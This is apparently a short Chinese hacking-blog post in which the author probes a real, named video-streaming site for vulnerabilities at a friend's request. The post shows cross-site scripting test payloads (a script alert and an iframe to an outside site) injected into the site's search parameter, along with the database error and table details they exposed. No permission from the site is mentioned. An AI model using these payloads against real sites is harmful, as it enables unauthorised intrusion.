前天黑眼圈发来一个站
http://www.ppstream.com/
让找漏洞
看了下排名.汗.全球排名589..

这样的站安全系数按理来说一定很高的..想从注入方面下手机率不会很大.

看了下主页有个节目搜索.
输入
<script>alert("fhod")</script>
http://so.ppstream.com/?key=<script&g ... ")</script>
出错信息
[handle]QUERY STRING:select count(channel_name) from pps_channel_info where contains(playbill,?,1)>0 Biuld Array:Array
(
    [0] => 
)
[Last query: select count(channel_name) from pps_channel_info where contains(playbill,:0,1)>0 ]
[Native code: 29902]
[Native message: ORA-29902: error in executing ODCIIndexStart() routine
ORA-20000: Oracle Text error:
DRG-50900: text query parser error on line 1, column 9  
DRG-50905: invalid score threshold ALERT  
]
Error Message:MDB2 Error: unknown error

开始输入的
被换成了大写..
<SCRIPT>ALERT("FHOD")</SCRIPT>
但却不提示.
试着搜索

<iframe src=http://www.ciker.org/  width=200 height=200></iframe>

（责任编辑：hahack）